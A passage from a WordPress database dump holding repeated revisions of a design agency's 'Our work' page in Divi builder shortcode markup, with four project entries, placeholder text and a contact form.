button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Work','','inherit','closed','closed','','396-revision-v1','','','2020-08-08 20:24:39','2020-08-08 20:24:39','',396,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/396-revision-v1/',0,'revision','',0),(717,1,'2020-08-08 20:29:10','2020-08-08 20:29:10','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"|||\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Our work</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off%22\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Projects Section\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"50px||50px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 01\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]01\r[/et_pb_text][et_pb_cta title=\"Wet & Dry - Corporate Catalogue\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"4.5.2\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" hover_enabled=\"0\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p>A Corporate Brochure/ Product Catalogue to represent the key USPs of the brand and company as a whole. Wonderful graphic designing and beautiful product shots to make the product and brand stand out for an awesome b2b representaiton.</p>\n[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-b1-1.jpg\" alt=\"Brochure-catalogue\" title_text=\"800x800 b1 (1)\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 02\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"Creative graphic designing\" title_text=\"Creative graphic designing\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]02\r[/et_pb_text][et_pb_cta title=\"Neud - Product Packaging\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"4.5.2\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" hover_enabled=\"0\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" content__hover_enabled=\"on|desktop\"]<p>The product packaging design is planned keeping in mind the rich and luxory look. The brand colors has been used in an effective arrangement to carry the product family design language and keeping it unique at the same time. Wonderfully executed 3D Mockup.</p>\n[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 03\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]03\r[/et_pb_text][et_pb_cta title=\"Iqra - Business Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg\" alt=\"Flyer Design\" title_text=\"Flyer Design-graphic design work\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 04\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]04\r[/et_pb_text][et_pb_cta title=\"Ninza - Branding Identity\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Work','','inherit','closed','closed','','396-revision-v1','','','2020-08-08 20:29:10','2020-08-08 20:29:10','',396,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/396-revision-v1/',0,'revision','',0),(719,1,'2020-08-08 20:32:39','2020-08-08 20:32:39','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"|||\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Our work</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off%22\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Projects Section\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"50px||50px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 01\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]01\r[/et_pb_text][et_pb_cta title=\"Wet & Dry - Corporate Catalogue\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"4.5.2\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" hover_enabled=\"0\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p>A Corporate Brochure/ Product Catalogue to represent the key USPs of the brand and company as a whole. Wonderful graphic designing and beautiful product shots to make the product and brand stand out for an awesome b2b representaiton.</p>\n[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-b1-1.jpg\" alt=\"Brochure-catalogue\" title_text=\"800x800 b1 (1)\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 02\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"Creative graphic designing\" title_text=\"Creative graphic designing\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]02\r[/et_pb_text][et_pb_cta title=\"Neud - Product Packaging\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"4.5.2\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" hover_enabled=\"0\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" 